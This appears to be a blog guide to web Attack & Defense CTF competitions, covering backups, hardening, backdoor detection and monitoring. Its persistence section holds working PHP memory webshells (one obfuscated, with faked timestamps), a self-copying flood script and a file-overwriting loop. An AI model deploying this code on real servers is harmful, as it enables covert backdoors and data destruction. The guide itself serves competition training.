Attack & Defense Tips

Attack & Defense CTFs are a less common kind of CTF with more moving parts. They’re rarely done for the general public because of their complexity.
In an A&D (sometimes AWD) CTF, teams are each given the same set of vulnerable server software. Teams are to setup & audit this software before the competition. At the start of the competition, teams will connect their servers to an isolated network to join the CTF.
Within this network, teams will launch attacks against each others servers hoping to exploit the vulnerabilities they’ve found. Likewise, teams will need to properly patch their software so that it is protected against these exploits and functions normally.
Teams receive points for extracting flags, properly defending their flags, and keeping their servers operating normally.

Preperation

This passage is mainly for web A&D, so all is about protecting your web application and break others.

Backup

At the real start, we have to backup src dir and db data, so that we are able to recover the server if being attacked without knowing the vulns.

# backup files
# pack on gamebox
$ tar -zcvf web.tar.gz /var/www/html/
# download to host 
$ scp -r -P Port remote_username@remote_ip:remote_folder local_file

# dump mysql database
$ cd /var/lib/mysql
$ mysqldump -u root -p your_db>your_db.sql
Enter password: 
# dump all dbs
$ mysqldump --all-databases > bak.sql

And to recover:

# recover mysql database
$ mysql -u root -p your_db< your_db.sql
# or
$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
...
mysql> create database your_db;
Query OK, 1 row affected (0.01 sec)
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| your_db            |
+--------------------+
5 rows in set (0.00 sec)

mysql> use your_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> source your_db.sql
Query OK, 0 rows affected (0.00 sec)
...

Secure

Then we need to change password for ssh, database and the admin page of the site, leaving no backdoors and weak passwords.

# change ssh passwd
$ passwd
Changing password for xxx.
Current password:
New password:
Retype new password:

# change mysql passwd
$ mysqladmin -u[user_name] -p[old_passwd] password new_passwd 
# or in mysql cli
mysql> set password for user_name@localhost = password('new_passwd');
# or edit table 'user'
mysql> use mysql;
mysql> update user set password=password('new_passwd') where user='user_name' and host='localhost'; 
mysql> flush privileges; 
# in mysql 8
mysql> USE mysql
mysql> ALTER USER 'user_name'@'localhost' IDENTIFIED WITH MYSQL_NATIVE_PASSWORD BY 'new_passwd';
# or add 'skip-grant-table' if forgetting root password

Easy ways to detect backdoors (some tools will introduce below) :

$ find . -name '*.php' | xargs grep -n 'eval('
$ find . -name '*.php' | xargs grep -n 'assert('
$ find . -name '*.php' | xargs grep -n 'system('

Make sure service ports opend and other ports closed (netstat, ss, kill) , and the key files privileges under control (lsattr, chattr) .
Visit Linux Security Response for detailed commands.

Attack (Control)

The web A&D is like tiny but fierce pentest.

Code Audit

It is the basic way to attack. Normally we use “off-the-shelf” scanners to check the “artificial” backdoors and identify vulnerabilities quickly.

• Seay
• D WebShellKill
• SafeDog

Persistence

After we take over the target, we have to make it persistent, and here are some methods.

1. Reverse shell

To manage shells: Reverse-Shell-Manager
Other shell collections like: webshell, php-webshells … all on github.

2. Memory webshell

It is a program inside the PHP process, producing webshell all the time. Here gives some examples:

<?php 
ignore_user_abort(true);    // script runs even user aborts
set_time_limit(0);          // set running time limit
unlink(__FILE__);           // delete file (itself)
$file = 'write.php';            // file name 
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; // content
// access by .../pass=pass, post-data:c=cmd
while (1){
    file_put_contents($file,$code); // write 'code' to 'file'
    system('touch -m -d "2020-11-20 19:05:30" .write.php'); // fake the date info
    usleep(5000);
} 
?>

But you can be better:

<?php
 ignore_user_abort(true);
 set_time_limit(0);
 $file = 'c.php';
 $code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+'); // <?php eval($_POST[c]);?>
 while(true) {
     if(md5(file_get_contents($file))===md5($code)) {   // prevent from changing, like commenting original php code
         file_put_contents($file, $code);
     }
     usleep(50);
 }
?>

Or you can bomb the memory:

<?php
    set_time_limit(0);
    ignore_user_abort(true);
    while(1){
        file_put_contents(randstr().'.php',file_get_content(__FILE__));
        file_get_contents("http://127.0.0.1/");
    }
?>

To delete them:

<?php
    set_time_limit(0);
    ignore_user_abort(1);
    array_map('unlink', glob("some/dir/*.php"));
?>

Or to change them:

<?php
    set_time_limit(0);
    ignore_user_abort(1);
    unlink(__FILE__);
    function getfiles($path){
        foreach(glob($path) as $afile){
            if(is_dir($afile))
                getfiles($afile.'/*.php');
            else
                @file_put_contents($afile,"#Anything#");
                //unlink($afile);
        }
    }
    while(1){
        getfiles(__DIR__);
        sleep(10);
    }
?>

About worm php webshell, visit awd_worm_phpwebshell_framework (in Chinese)

3. Apache Thread Injection

A faster way than php memory webshell. A Linux C memory shell is even faster for sure.

Defence

Except securing that we mentioned in Preperation, we can use some “off-the-shelf” scripts to help defending.

Traffic & File Monitor

• WebLogger
• Watchbird

Some of my collection: filemon.py, logger.php, logger1.php, logger2.php, waf.php, waf1.php.
Write require_once('xxx.php'); to the page you want to protect, better be the one required by many other pages.

Kill Memory Webshell

Use kill -9 -1 to kill each process of current user, so as the memory webshell process.
Or refer to Persistence part to kill them using similar methods (delete them constantly).
Create directory or file with the same name of memory webshell (writing empty file constantly) to prevent generating.

Google this you can also get a bunch of results.

Sometimes we meet file names starting with / or -, which will mess your bash.
For file names like /abc, which will be regarded as path, just rm '/abc' to delete.
For file names like -abc, which is treated as an invalid option, add -- ahead to delete, like rm -- -abc

White List Control

For Apache it would be .htaccess, while for Nginx it would be nginx.conf, write white list config to it for better access control.

Other Tools & Scripts

Actually many github repos like AWD-Predator-Framework, Prepare-for-AWD, AoiAWD and CTFDefense are about Attack with defence (in Chinese), concerning WAF building, and automatic flag uploading.

An interesting awd-platform is to set up your awd environment(web challenges only).